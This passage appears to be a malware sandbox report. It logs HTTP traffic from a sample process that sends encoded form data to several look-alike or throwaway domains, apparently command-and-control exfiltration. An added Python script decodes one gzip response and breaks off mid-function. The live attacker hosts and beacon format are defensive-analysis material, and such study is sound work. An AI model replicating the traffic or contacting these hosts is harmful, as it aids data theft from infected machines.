                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.remedies.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Dec 4, 2024 15:32:19.810862064 CET  417                IN         HTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Wed, 04 Dec 2024 14:32:19 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 277
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 68 45 74 75 48 3d 69 4e 6b 38 54 55 7a 73 34 4c 41 30 78 6d 4c 69 79 66 58 4c 30 68 67 47 6a 41 54 41 46 73 44 6e 69 2b 35 7a 74 4a 31 78 54 37 31 66 55 72 43 6e 4e 79 55 79 5a 41 71 59 74 32 72 56 79 67 34 6c 4d 72 74 33 6a 48 46 38 77 66 36 45 73 5a 34 52 33 71 79 72 74 6f 35 74 76 77 72 4b 51 45 56 71 67 6c 67 5a 4d 73 59 66 32 79 50 53 68 63 4c 4f 35 61 49 39 55 73 51 67 35 77 44 37 30 43 4d 61 4e 5a 4d 64 41 46 6b 4c 48 30 6b 66 26 39 68 79 3d 67 76 72 44 53 38 55 38 4f 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GhEtuH=iNk8TUzs4LA0xmLiyfXL0hgGjATAFsDni+5ztJ1xT71fUrCnNyUyZAqYt2rVyg4lMrt3jHF8wf6EsZ4R3qyrto5tvwrKQEVqglgZMsYf2yPShcLO5aI9UsQg5wD70CMaNZMdAFkLH0kf&9hy=gvrDS8U8OP"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49907 | 43.199.54.158 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:32:25.275300026 CET | 744 | OUT | POST /iyce/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.327531.buzz
Origin: http://www.327531.buzz
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.327531.buzz/iyce/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=6vTpBMUQMQrEsnWy4s44k3xFUzS7v76CjaDe6es1M6dFABburKWMxKRG7KcRQIoObpYog6ue2kxBbxYmGajdXX737rKGsyOwCNsv7B/YXmsUY3icBE9fvtZTyWSOJ5jURWU5CIf732vDgNfSDqZJ5aDDtDIkKMGrko1w2+rSUBF6Em2XyUGSASRUbRQ4jTAMax4U6uGmfWjY4ZUgTQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49913 | 43.199.54.158 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:32:27.940026999 CET | 764 | OUT | POST /iyce/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.327531.buzz
Origin: http://www.327531.buzz
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.327531.buzz/iyce/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=6vTpBMUQMQrEjnmy7PQ4zHxEQDS76L68jaPe6f4lPIpFOALuqIuMyKRGj6cQUIoFbpEag6Se2gZBbxImGN3cYn6RzLKIxiOwCNsv7Fv2XmkUbE6cDmVQhNZS1WSODpjYRWU+CJDB30XDgIzSC7ZIzaCKijJSKu3k+L5s49XJd2xNBQ31o2K+eDpvfT0O01d5Yw8M3MyHAhGy1L1kFncwAYqONZU1BbKrS90ynKo=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49918 | 43.199.54.158 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:32:30.596649885 CET | 1777 | OUT | POST /iyce/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.327531.buzz
Origin: http://www.327531.buzz
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.327531.buzz/iyce/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49924 | 43.199.54.158 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:32:33.249103069 CET | 489 | OUT | GET /iyce/?9hy=gvrDS8U8OP&GhEtuH=3t7JC5hyAznKgFuU/ok1lWIiNGSssLiqmP3wqdAXOPpvMCbWrZKV3/4RkaY4Wf52BZA497amiF58UAMjS7eJfGDv95acxgS2B5U2yxi5cABrTEK2ZEsstqoE20nhTJm6WmYVOoPh7UOe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.327531.buzz
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49980 | 136.143.186.12 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:33:01.311480999 CET | 762 | OUT | POST /hxjq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.everythlngict.org
Origin: http://www.everythlngict.org
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.everythlngict.org/hxjq/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=MIlI54IAWWhzgktXa59BTawq7mca+ZpwwJ5YQleeU+ztIHcESQLExAn5Oy4F9kwa/3JYeiyl/EP2YufBWEYzJhb47izCBc9cuwqpNdGzToYInmk7JYbXq78B8jLKTIWempWUjHbXxpfyquLbm5wBhL/rWmQ/dspG7NN5d/LUezm70y6DKIewd6Ho1EUVwmVxr/4dzKkq0cQ77wkQPQ==
Dec 4, 2024 15:33:02.636681080 CET | 1236 | IN | HTTP/1.1 404
Server: ZGS
Date: Wed, 04 Dec 2024 14:33:02 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
Set-Cookie: csrfc=a28ca090-3d24-4302-b2b7-aecb5b16006b;path=/;priority=high
Set-Cookie: _zcsr_tmp=a28ca090-3d24-4302-b2b7-aecb5b16006b;path=/;SameSite=Strict;priority=high
Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: accept-encoding
Content-Encoding: gzip
Data Raw: (gzip-compressed response body omitted)
Dec 4, 2024 15:33:02.636749029 CET | 732 | IN | Data Raw: (continuation of gzip-compressed response body omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49985 | 136.143.186.12 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:33:04.017218113 CET | 782 | OUT | POST /hxjq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.everythlngict.org
Origin: http://www.everythlngict.org
Content-Length: 239
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.everythlngict.org/hxjq/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=MIlI54IAWWhzhEdXW6VBR6wpl2ca35p8wOxYQg7DUNXtGGsEUkfEhQn5FS46iUxY/3Fmeg2l/Er2Ys3BXzE8Ixb6vSzXP89cuwqpNZuVToAIn3U7GZbQ1L8G9jLKEYWgmpW6jCywxrXyqu7bnrIGuL+gJWRfZ5Md0PNxYdSLH02P1E7hQqScDr/TxGwjnAIEp+8F+oQLrr1R2iFUZtCY2MFRvzFGyKcdqBdkG0c=
Dec 4, 2024 15:33:05.293071985 CET | 1236 | IN | HTTP/1.1 404
Server: ZGS
Date: Wed, 04 Dec 2024 14:33:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
Set-Cookie: csrfc=6284747a-e160-4690-9d3d-a35ccdcf76b7;path=/;priority=high
Set-Cookie: _zcsr_tmp=6284747a-e160-4690-9d3d-a35ccdcf76b7;path=/;SameSite=Strict;priority=high
Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
vary: accept-encoding
Content-Encoding: gzip
Data Raw: (gzip-compressed response body omitted)
Dec 4, 2024 15:33:05.293180943 CET | 732 | IN | Data Raw: (continuation of gzip-compressed response body omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49988 | 136.143.186.12 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:33:06.713494062 CET | 1795 | OUT | POST /hxjq/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.everythlngict.org
Origin: http://www.everythlngict.org
Content-Length: 1251
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.everythlngict.org/hxjq/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=MIlI54IAWWhzhEdXW6VBR6wpl2ca35p8wOxYQg7DUNftG10ES1fEzAn5My47iUxZ/3diegqb/GD2ZNXBQCE8Bxb6tSzDBc9zuw6lNdCVToAIn1M7PobQzL8B8jLWTIWbmo+MjC/Hxb3yqKfbq4wGnL+iIWR9Z5I40PAKYc3gHzCP5gaKHrKqXJj8534Qvhsij8gc+fAC1apk3RZ5TqTOgNoj2HxTiKJjxCp3EhqloA5MmuKEuxEEIq/nsRRzqft0fXAtMopDX1NgMpYkrCfucG6QI6WvFeBJDPBkq26zfU+8RmAWwT/lPs3eGkar7rPNlb6Jh9v73pkZO/NgoxO4TDRvw1duXlJZZaeweB+EqksHfJMH/QSS10MchjpL2F1QQFB30+8M7sv/HV2dSJEDYLkKTTyWqq4RQ5Zg8Dh0DnD5e8HbjiVC4mwQcfvKUGm7c8tXqOmNlEJzL8jn2HiP7BhSR5GZcRyUaCY9rwkdnTLkBQy3eQa3mKG8nz9iLek84L35q30XiJA6TrRspFp3F+yXBlXlgGi4S6DIZGUzJWPuhJdVmZJIf3I57vHQYbFIqs5dR7sL047/5Ln1tx/FkPnpr6WFWdTjU6FJfOzmFdbwPd1yMdcVyFS2+nF12ih/qRHbwbllYIPRQooLq18rpusyOLFhjy9SJblfsZ7uhOkOjF8gNkqts0/UZkaEfpXmh80TddP1AV/wL5mhqNrHyNM12eafng4mgEk1gdWqjCHU778blo6gRT3WOlUYxsJvapeSIAo0BMK/qh/JmQTAU17KLJONREmrWzdNF+V1o3lnmZ1LZbBT5fJl/FUcCegntHSTz0xP44NMxSXrw8p20EXfEQB75gOJR+TtzyyvaiyhVKxfvaYd+mTIxOUZPb00kcWP0FgVcscbCePyItoy3r1DLhLuaK//uYmM1iP4YpkXR7PVWZUe183XGP150mdgN5+zvhK8KBxLGK93U/jpYksPHkvBT94Rabqh8nknMaS9B [TRUNCATED]
Dec 4, 2024 15:33:07.994160891 CET | 549 | IN | HTTP/1.1 400
Server: ZGS
Date: Wed, 04 Dec 2024 14:33:07 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 80
Connection: close
Set-Cookie: zalb_8ae64e9492=346483e803ff107bf3906cbcefa288fe; Path=/
Set-Cookie: csrfc=3f29aa18-eee7-45f4-8586-45ec0353fe88;path=/;priority=high
Set-Cookie: _zcsr_tmp=3f29aa18-eee7-45f4-8586-45ec0353fe88;path=/;SameSite=Strict;priority=high
Set-Cookie: JSESSIONID=2E8ACC588748F6C3806256523C52DCB9; Path=/; HttpOnly
Data Ascii: {"response_code":"400","status_code":"1","developer_message":"Invalid input."}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.749991136.143.186.12807000C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 4, 2024 15:33:09.372771978 CET495OUTGET /hxjq/?GhEtuH=BKNo6O8yWzEApXpxZdhvBLsS4mUhkJt064RYd0HbUq7fKEZlE0/hsCP6DjMyuX8dqHZGPQa4k2P/eM3nbiU+NzaMvzu4IfNUiCKwEJ3hTOhx8HANTpWY2e8g5zzoSZCTjrGp61nu9rmD&9hy=gvrDS8U8OP HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.everythlngict.org
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                 Dec 4, 2024 15:33:10.647532940 CET | 1236 | IN | HTTP/1.1 404
                                                                                Server: ZGS
                                                                                Date: Wed, 04 Dec 2024 14:33:10 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 4649
                                                                                Connection: close
                                                                                Set-Cookie: zalb_8ae64e9492=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/
                                                                                Set-Cookie: csrfc=b79df3d8-c33d-471b-b97a-ef230161dea9;path=/;priority=high
                                                                                Set-Cookie: _zcsr_tmp=b79df3d8-c33d-471b-b97a-ef230161dea9;path=/;SameSite=Strict;priority=high
                                                                                Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate
                                                                                Pragma: no-cache
                                                                                Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                vary: accept-encoding
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 [TRUNCATED]
                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50
                                                                                 Dec 4, 2024 15:33:10.647759914 CET | 224 | IN | Data Raw: 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a
                                                                                 Data Ascii: %, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:452px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{
                                                                                 Dec 4, 2024 15:33:10.647766113 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 31 38 70 78 20 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 63 6f
                                                                                 Data Ascii: margin-top:3px; padding:18px 0px; } .content{ background-color:#fff; border-radius:4px; border-left:1px solid #e9e9e9; border-right:1px solid #e9e9e9;
                                                                                 Dec 4, 2024 15:33:10.648433924 CET | 1236 | IN | Data Raw: 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 2d 69 6e 66 6f 7b 20 20 0a 20 20 20 20 20 20
                                                                                 Data Ascii: omain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0; list-style:none;
                                                                                 Dec 4, 2024 15:33:10.648441076 CET | 1236 | IN | Data Raw: 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 43 6f 6c 6f 72 73 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20
                                                                                 Data Ascii: } </style> </head> <body> <div class="topColors"></div> <div class="mainContainer"> <div class="logo"><img src="https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb" alt="Zoho"></div> <di
                                                                                 Dec 4, 2024 15:33:10.648457050 CET | 7 | IN | Data Raw: 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: /html>


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                 21 | 192.168.2.7 | 49993 | 172.67.192.207 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 Dec 4, 2024 15:33:16.198621035 CET | 774 | OUT | POST /8292/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-US,en;q=0.5
                                                                                Host: www.3kw40881107247y.click
                                                                                Origin: http://www.3kw40881107247y.click
                                                                                Content-Length: 219
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Referer: http://www.3kw40881107247y.click/8292/
                                                                                User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                Data Raw: 47 68 45 74 75 48 3d 51 6c 6f 33 79 73 42 71 65 6f 55 79 75 65 39 73 70 62 4e 6f 49 6c 41 58 31 4c 64 4e 71 72 35 50 52 31 57 5a 46 70 4f 38 6b 4f 31 75 2b 37 50 7a 65 38 62 74 69 79 30 2f 59 2b 6b 68 6a 51 47 4f 4e 73 33 72 6d 69 6d 68 6d 77 55 51 33 75 72 33 54 52 6e 56 45 41 75 34 52 46 2b 37 6d 34 70 76 6a 64 37 49 42 52 76 2b 79 65 78 51 2f 75 43 52 42 47 4f 45 71 4b 41 4c 65 61 67 5a 37 75 78 30 63 6a 74 64 2b 66 33 35 77 43 63 53 63 4f 49 6c 76 6f 4c 50 72 37 53 39 61 6a 52 76 67 75 51 6b 57 33 4a 6d 43 70 2f 4c 4c 2f 51 59 49 36 32 31 52 4d 79 78 62 74 68 48 67 35 43 48 73 30 34 67 74 33 66 41 5a 64 71 42 32 56 48 59 6c 45 38 63 6e 51 3d 3d
                                                                                Data Ascii: GhEtuH=Qlo3ysBqeoUyue9spbNoIlAX1LdNqr5PR1WZFpO8kO1u+7Pze8btiy0/Y+khjQGONs3rmimhmwUQ3ur3TRnVEAu4RF+7m4pvjd7IBRv+yexQ/uCRBGOEqKALeagZ7ux0cjtd+f35wCcScOIlvoLPr7S9ajRvguQkW3JmCp/LL/QYI621RMyxbthHg5CHs04gt3fAZdqB2VHYlE8cnQ==
                                                                                 Dec 4, 2024 15:33:17.332479954 CET | 927 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 04 Dec 2024 14:33:17 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=obGPbf5%2FgCZU2EXKF3T85S0EPaeGffiv0vGQObzmDsjtyx%2BWefqSOr%2FJTCo6WRhW7fA6qk62gOk5aH3GIXqpCnCLUNxOhULfG5I2nRrnGZyyoSn0Or0ZuLoNebI9znNqjrap30K%2FVWn4Akbw"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8ecc82ba2ae74382-EWR
                                                                                Content-Encoding: gzip
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=15135&min_rtt=15135&rtt_var=7567&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
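
The three POST sessions to 172.67.192.207 (21, 22 and 23) all receive the same 404 with Transfer-Encoding: chunked and Content-Encoding: gzip, so the "Data Ascii" line directly above is compressed bytes rendered as text and carries no information. The script below is an added example, not part of the Joe Sandbox report: it takes the body bytes transcribed from session 21's "Data Raw" line, reassembles the single 0x6d-byte chunk and reads the gzip trailer. The trailer's ISIZE field is 0x92 = 146 bytes, exactly the length of the plain nginx 404 page that session 24 receives unencoded from the same host, so that page (transcribed here for the comparison) is the likely plaintext; the CRC32 comparison settles the question if the two agree. Inflating the stream is attempted as well but treated as optional, since a sandbox dump may be truncated.

```python
"""Dechunk and inspect the gzip-compressed 404 body from session 21.

Added example, not part of the Joe Sandbox report. SESSION21_BODY is
transcribed from the session 21 "Data Raw" line; NGINX_404_BODY is the
uncompressed page from session 24, used as the candidate plaintext.
"""
import struct
import zlib

# Session 21 response body exactly as captured (chunk size line, one gzip
# member, terminating zero-length chunk).
SESSION21_BODY = bytes.fromhex(
    "36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 "
    "c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 "
    "e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 "
    "79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a")

# Plain nginx 404 page as returned in session 24 (146 bytes on the wire).
NGINX_404_BODY = (b"<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n"
                  b"<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx</center>\r\n"
                  b"</body>\r\n</html>\r\n")


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body (RFC 9112, section 7.1)."""
    out, pos = bytearray(), 0
    while True:
        eol = body.index(b"\r\n", pos)
        # Chunk size is hex; anything after ';' is a chunk extension and is ignored.
        size = int(body[pos:eol].split(b";")[0].decode("ascii"), 16)
        pos = eol + 2
        if size == 0:                 # last-chunk; optional trailers follow
            break
        out += body[pos:pos + size]
        pos += size + 2               # skip the CRLF that terminates the chunk data
    return bytes(out)


def gzip_trailer(member: bytes) -> tuple:
    """Return (CRC32, ISIZE) from the 8-byte little-endian gzip trailer (RFC 1952)."""
    if member[:2] != b"\x1f\x8b":
        raise ValueError("not a gzip member")
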